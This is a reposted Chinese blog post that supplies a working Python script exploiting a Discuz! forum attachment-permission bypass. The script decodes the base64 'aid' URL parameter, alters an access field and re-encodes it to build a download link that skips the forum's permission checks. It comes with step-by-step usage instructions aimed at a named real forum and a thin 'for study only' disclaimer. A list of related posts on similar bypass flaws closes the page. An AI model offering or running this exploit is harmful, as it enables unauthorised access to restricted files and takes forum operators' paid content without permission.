Python 实现 Discuz论坛附件下载权限绕过漏洞
背景:最近压力有些大,想玩点游戏放松下,去Mac论坛下载,发现需要各种权限,于是蛋疼了。
所以,上网查了discuz! x3.1破解,手动替换,发现出现“链接已过期”。所以写了下面程序。
0.将下列代码复制到你的python IDE中。
1.先进网页,chrome浏览器查看网页元素,替换正则表达式内内容。
2.刷新你要下载的页面,右键复制下载链接 url = ‘你复制的链接’
3.运行python,你的IDE里面就会打印出真实下载地址。
运行环境:python3.5
操作系统:macpro 2016
import base64 import re# 这里是你鼠标单击右键-》保存要下载的链接。替换 url = '你复制下来的链接' # 其中"第一部分"是'.forum.php?mod=attachment&aid=' "第二部分"是 forum.php?mod=attachment&aid= # 后面会用到 url = 'forum.php?mod=attachment&aid=NjE4NzF8NmM2ZDU4Y2Z8MTQ5ODgzNjUyMnwwfDIyMTg3'# url0是你要下载的网址的主页,加上"第二部分" 也就是 "forum.php?mod=attachment&aid=" url0 = 'http://m.tracker.7do.net/forum.php?mod=attachment&aid='# 正则表达,需要将括号内的"第一部分" 也就是 "forum.php\?mod=attachment&aid=" 替换成你复制链接的第一部分 p = r'(forum.php\?mod=attachment&aid=)(.+)' aid = re.search(p, url).group(2) z = base64.b64decode(aid)#下面的正则不用管 # print(z) p = r"(b')(.+)(')" z1 = re.search(p, str(z)).group(2) # print(z1) p = r"(.+)(\|0\|)(.+)" z2 = re.search(p,str(z1)).group(1) p = r"(.+)(\|0\|)(.+)" z3 = re.search(p,str(z1)).group(3) # print(z2) k = z2 + '|2|' + z3 k = bytes(k, encoding = "utf8") # print(k) # k = b'61871|acf3aa27|1498835323|1|22187' j = base64.b64encode(k) # print(j) p = r"(b')(.+)(')" j1 = re.search(p, str(j)).group(2) # print(j1) url1 = url0 + j1 print(url1)
备注:上面破解仅供学习使用,不要用在其他用途,如果侵权,请联系作者,也就是我,我会妥当处理。
不明白过程的,可以看下面的参考资料。
参考资料:
1. python str与bytes之间的转换
2.python中的正则表达式(re模块)
3.Discuz论坛附件下载权限绕过漏洞
转载于:https://www.cnblogs.com/cbds/p/7101123.html
Python 实现 Discuz论坛附件下载权限绕过漏洞相关推荐
- Discuz论坛附件下载权限绕过漏洞
近日,有网友在乌云上发布了一则Discuz论坛附件下载权限绕过漏洞,能够任意下载带有权限的附件并且无需扣除自身积分.目前Discuz正在处理中,但暂未放出漏洞补丁,有需要的朋友不妨趁漏洞修补之前到各论 ...
- php绕过授权下载,Discuz附件下载权限绕过方法
越权下载含有"阅读权限"的插件.下载插件免扣币 重现步骤: 1.使用管理员账户,上传一个有高阅读权限的附件 2.使用低权限的用户账户,下载附件,这个时候,Discuz会提示无权下载 ...
- 众至科技:漏洞通告 | 微软10月发布多个安全漏洞;Apache Shiro权限绕过漏洞;Apache Commons存在代码执行漏洞
微软发布10月多个安全漏洞 1.漏洞概述 2022年10月11日,微软发布了10月安全更新,此次更新修复了包括2个0 day漏洞在内的84个安全漏洞(不包括10月3日修复的12个Microsoft ...
- shiro权限绕过漏洞
1.shiro权限绕过漏洞 1.1.漏洞成因分析 Apahce Shiro 由于处理身份验证请求时出错,存在"权限绕过漏洞"(漏洞编号:CVE-2020-11989),远程攻击者可 ...
- couchdb 垂直权限绕过漏洞(cve-2017-12635)
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和 ...
- TrendNET路由器权限绕过漏洞(CVE-2018-7034)
TrendNET路由器权限绕过漏洞,攻击者通过设置$AUTHORIZED_GROUP >= 1绕过权限验证 影响版本: TEW-751DR – v1.03B03 TEW-752DRU – v1. ...
- launchAnyWhere: Activity组件权限绕过漏洞解析
前言 今年3月份,知名反病毒软件公司卡巴斯基实验室发布了一份关于中国电商平台拼多多的调查报告,称该平台的安装程序中含有恶意代码.这一消息引起了广泛的关注和讨论,也引发了人们对于拼多多平台安全性的担忧 ...
- python discuz_[Python代码]Discuz!论坛(X2.5)发帖及回复脚本
更多 昨天,我介绍了Discuz!论坛登录的Python脚本实现(点击进入).今天,我继续这一系列,介绍Discuz!论坛最常见的一类脚本操作--发帖及回复.这里,我只实现普通主题的发表以及回复的脚本 ...
- python登陆Discuz!论坛通用代码
分享一例python实现的登陆Discuz!论坛通用代码. 代码: #coding:gbk import urllib2,urllib,cookielib,re'''通用的登陆DZ论坛参数说明parm ...
- iOS 相册权限绕过漏洞
在 App Store 上有一款名叫 "时间规划局" 的应用可以在未获取相册权限的情况下读取照片.可能是 App 调用了苹果的私有库,绕过了系统的授权机制. 在 iOS 12.1. ...
最新文章
- 省呱呱典型用户和用户场景
- cmstop框架中的js设计content.js
- Java并发编程(04):线程间通信,等待/通知机制
- MinGW 64的安装 - 官网sourceforge安装失败非翻墙解决办法
- 【OpenCV】OpenCV函数精讲之 -- imshow()函数
- matlab怎么利用圆形度提取园,基于Matlab+GUI图像处理的物料粒度与圆形度测试.pdf...
- STM32|4-20mA输出电路
- Bresenham画线算法详解及其OpenGL编程实现
- Solidworks常用技巧
- php 开源周报系统,Pulsar 社区周报|2021-03-01~2021-03-07
- word给表头和图题按章节编号
- 微分方程的数值解法—四阶龙格库塔(Runge-Kutta)的推导以及C代码实现
- Kinect的Kinect Manager脚本简介
- 串的模式匹配算法 ← BF算法
- 计算机英语200心得体会,学英语的心得体会作文200字作文:学习英语的感受的英语作文(100~120词)...
- Excel数据透视,日期最大值或最小值显示为0
- linux awk 字符串匹配,awk匹配字符串
- graphviz画图之张柏芝前夫是谢霆锋
- 全新视角!带你一文读懂ChatGPT!
- 【VMware】win 10:解决 win 7 虚拟机系统屏幕没有适应 vmware 窗口全屏问题